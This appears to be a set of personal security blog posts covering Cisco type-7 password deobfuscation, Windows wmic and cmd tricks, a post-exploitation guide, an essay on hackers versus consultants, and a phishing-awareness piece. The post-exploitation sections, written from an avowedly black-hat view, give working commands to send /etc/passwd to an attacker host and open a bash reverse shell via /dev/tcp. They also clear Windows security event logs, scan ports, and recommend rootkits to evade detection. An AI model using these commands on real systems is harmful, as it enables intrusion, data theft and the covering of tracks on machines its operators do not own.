Decrypting...No..Deobfuscating Cisco IOS Passwords

Why I said not decrypt but Deobfuscating ???

The level 7 password is not actually encrypted . The Vigenere algorithm is used to obfuscate the passwords (there is not key used in this algo)

Cisco IOS uses this level-7 encryption when the "service password-encryption" command is used. 

I found some interesting info while I was getting tools to decrypt cisco level 7 password. Yes you might know that there are Lots of softwares available on net whcih decrypt cisco 7 secrete. But this method got my attention since it uses cisco commands to obtain cleartext password from the secret.

Here it goes...
The show key-chain command executed on Cisco IOS displays the password configured in a key chain in cleartext even when the same password is stored as type-7 obfuscated password in the router configuration. 

For example, if you want to get the cleartext password corresponding to string 04480E051A33490E, enter the following lines into the router configuration (any routers configuration it can be your router not necessary victims router :D) :- 

R1(config)#key chain test
R1(config-keychain)#key 1
R1(config-keychain-key)#key-string 7 04480E051A33490E

When you execute show key chain test command, the cleartext value of the password is displayed: 

R1#show key chain test
Key-chain decrypt:
key 1 -- text "secure"
accept lifetime (always valid) - (always valid) [valid now]
send lifetime (always valid) - (always valid) [valid now]

Walla Cleartext without using any tools

I also have found perl code by Bostjan Sustar to do the same task.
The perl code is uploaded at http://neo1981.googlepages.com/decrypt_cisco.pl

Windows Commandline KungFu Part 2

If you check out wmic has many good feature that we never use. Since I like commandline very much I am always upto commands and keybord shortcuts. :D

Now some more info about wmic...
If you use command

C:\> wmic /?
Then you would get a list of attributes and all the settings for given alias.

For example type

C:\>wmic share list full

AccessMask=
AllowMaximum=TRUE
Description=Remote IPC
InstallDate=
MaximumAllowed=
Name=IPC$
Path=
Status=OK
Type=-2147483645
...
...

Good ? not enough but there is more wmic is object oriented , so you've got attributes and methods. Attributes are cool, letting you get info about your box and tweak it a bit, but methods let you take action on a box, giving you real power.

For example

C:\> wmic process where name="cmd.exe" call getowner

Or, even:

C:\> wmic process where name="cmd.exe" call getownersid

Nice ! isnt it ?

Second Example : We want a built in command to reboot or shutdown windows box accross the network. Try this

C:\> wmic os where buildnumber="2600" call reboot


Third example get parameter (Atrribute of object)

C:\>wmic nic get macaddress,name


You want interface-related methods? Check these out:

C:\> wmic nicconfig call setdefaultttl 200
C:\> wmic nicconfig call settcpwindowsize 3212

Those change the IP TTL and TCP Window size from default settings to something else, possibly fooling some forms of passive OS fingerprinting. Be careful with them, though... changing those settings could hose your network performance, make your system ugly, and make your hair fall out. You have been warned!

Now how about some nasty example :D
Like from POST Exploitation ;)

you could:

C:\> wmic nteventlog where (description like "%secevent%") call cleareventlog

Guess what it would do ????


or events like those associated with logging onto the box:

C:\> wmic ntevent where (message like "%logon%") list brief

Fifth, here is one that could be useful for handlers:

C:\>wmic netlogin where (name like "%neo%") get numberoflogons
NumberOfLogons
1760

Where neo is username offcourse.

you can use methods associated with "wmic service" to change the service configuration, as in:

C:\> wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled


//Spot odd executables
C:\> wmic PROCESS WHERE "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath

//Look at services that are set to start automatically
C:\> wmic SERVICE WHERE StartMode="Auto" GET Name, State

//Find user-created shares (usually not hidden)
C:\> wmic SHARE WHERE "NOT Name LIKE '%$'" GET Name, Path

//Find stuff that starts on boot
C:\> wmic STARTUP GET Caption, Command, User

//Identify any local system accounts that are enabled (guest, etc.)
C:\> wmic USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name"

Enjoyyyyy....

Post Exploitation 2

We had discussion going on the topic Post exploitation when I realized that in my first post I didnt put any special things on windows. So I am adding that information in this second post on this topic.

Like lots of people dont know that there are FOR loop on windows command line using which we can have a ping sweep or port scan from cmd without any thirdparty tools.

Ex.

Ping Sweep: Using following command we can run a ping sweep
FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

This command will run a ping sweep on 10.10.10.0/24

Command line port scanner using ftp client:
The windows ftp client can be used as a port scanner.
But
C:\> ftp [IP_address]
This is not allowing to put port number and defaults to port 21 for connection.
But... we can specify a destination port in a ftp command file
- open [IP_addr] [port]

FTP client then can read this ftp commands file and execute them.

C:\> ftp -s:[filename]

So using this and FOR loop together...

for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Now the ports.txt will have output of the port scanner.

One more option in the FOR command let us use file as input

Ex. There is file with name PTips.txt containing one IP address each line
so following command will iterate through the file.

FOR /F "delims=^" %i in (PTips.txt) do ping %i

C:\>ping 222.222.222.222
Pinging 222.222.222.222 with 32 bytes of data:
Reply from 222.222.222.222: Destination net unreachable.
...
...

One more addition
Having only cmd in windows does put lot of restrictions.
Lots of time I miss the simple commands like in linux to get HTML pages.
Can we download HTML pages on windows without Browser ???
...
...
...
Yes We Can
The problem with telnet is it dont allows us to redirect the output or screen to some file...
So... so we use -f for creating log of the telnet session.
Ex. Windows telnet as simple HTTP GET tool
C:\> telnet -f log.txt
Welcome to Microsoft Telnet Client
Escape Character is 'CTRL+]'
Microsoft Telnet>o in.yahoo.com 80
...
...
Microsoft Telnet>sen GET / HTTP/1.0
...
Html contents will scroll down all of sudden but dont worry,
all that content will be saved to the log file: log.txt
There you go.

web hit counter

Post Exploitation...

One of my fren asked that "scenario is that you have gotta interactive shell on remote machine (linux/windows) with admin privileges (not semi interactive like c99, r57 etc. i.e. suppose you have got the command prompt / console)"

Now what do you think you would be doing as "POST EXPLOITATION" to have complete control over the server.

As per his request my answer is from black hat perspective...

After getting access to any victim machine most important thing is to maintain access. And a hacker should do all things necessary to maintain access.

I had herd comment from some one that he would install some service like VNC. Ofcourse this is lame answer according to me. But it draws attention to a basic point should we install some different backdoor ? I would rather suggest use of the existing service as backdoor instead of creating a new one. Becuase at this point we have to consider the fact that normally there would be some firewall in between attacker and the victim. So creating a new backdoor might not be usefull if the firewall is not allowing that service to accept connections. Anyways installing new backdoor means more files transfered to the victim, therefore more chances of getting detected.

If one want to use the backdoor then it should be used with addition of root kit ofcourse.
E.g.
Windows Rootkit ex. AFX Windows Rootkit: This rootkit will hide processes, files, folders
registry keys and netstat entries from Windows 95/98/ME/NT/2k/XP/2003

Linux Rootkits: No particular examaple I am giving, there are lots of which hide processes,files etc.

Using Inbuild linux Tools instead of external backdoors
For linux I would rather use the inbuild tools in linux to do things for me.
Most importatnt reason for this is "No external tool mean nothing for detect for antivirus" B-)

On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
Ex.
Victim>echo "Hello WOrld" > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
Hello WOrld

Not Imressed then look at this

Victim>cat /etc/passwd > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
root:x:0:0:root:/root:bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...
...

Transfer file without using even nc

Ok file transfer could be done What else do I want to do on my rooted box ?
have Backdoor shell,Scan for other Machines can we do that without external tools ???
...
...
Of course we can
...
How ??
Linux /dev/tcp .... is the key

Victim$>/bin/bash -i > /dev/tcp/10.10.10.66/2345 0<&1 2>&1

Attacker>nc -l -p 2345
victim@linux:~$whoami
user12

Now Port scanning...
you guessed correct /dev/tcp :D

$ echo > /dev/tcp/10.10.10.66/25
bash: connect: Connection Refused
bash: /dev/tcp/10.10.10.66/25: Connection refused

$ echo > /dev/tcp/10.10.10.66/80
$ #Command successful means port 80 is listening


This is just some example you can go ahead with you own tricks... So this concludes some of the things ( only some of things.. ;) ) I would do Post Exploitation

Hacker and Security Consultant

Some days ago when I was viewing a video from the shmoocon 2008, Hackajar told a very interesting difference between a hacker and security professional, he said

"Under the Age of 25 you are a hacker you are over the age of 25 you are a security professional"

So I was thinking about this statement like and I was like "Waw" how true !! Like when we are in our young age we dont have responsibilities on us. Most probably parents are paying for our education and for our living. At those time we can go on and on doing hacking stuff but we dont get any pay for that. They say White Hat, black hat are there black hat dont like white hats but there is one important statement made by simple nomad in this talk that was

"The basic different between Black hat and white hat hacker is that White hat has Mortgage."

So when you get little older responsibilities come, you need to earn for living. At that time one will think and I like to hack things, if I get a money to hack things then why I shouldn't take this opportunity ? Yes there are some restrictions on the you when you become white hat but every thing has its plus and minus. So its so true that as hackers become old they might go to the security scene. So whats bad in that ?

Lack of Information Security Conern in India - Part 2

Continuing from where I left...
The only sector which has a little bit of sense of security is the financial sector.
That too they have learned from the foreign financial institutes. There has been lots
of wire frauds, cracking in the financial sector. Lots of time this kind of cracking is
done by a script kiddie.
(For the Dummies: Script Kiddie is a person who just downloads
some programs and try to attack on a computer system without understanding what the program
does. I have also seen conditions where the script kiddies are using some windowz cracking program
against the linux sytems)
The most famous crack in the financial sector is phishing ( pronounced as Fishing).
Phishing is done by using social engineering techniques. Phishers attempt to fraudulently acquire
sensitive information, such as usernames, passwords and credit card details, by acting as a mail came from the financial institute. eBay and PayPal are two of the most targeted companies, and online banks are also common targets.
Phishing also work most of the times when there is no concern about security in the users mind. No I have a concern for
security. i know that no bank in the world will ask me to send my password in the mail. But lots of normal users dont
understand this. Phishing also used Fake websites lots of times. But if the user is carefull to look at the url bar to
see that the url of the site is different that the url user is visiting then harm can be avoided. I know some of you will say that there are some java scripts that try to cover the address bar by a image of the leagal url. But this type
of phishing is more sophisticated and not that much in numbers. (If we disable javascript for unknown site we can stop this kind of attack.) Lot more phishing is done by script kiddies than the pros. I wont say we will be 100% percent secure but with a little bit of awareness we can avoid these script kiddies. So I again say that awareness in people is must.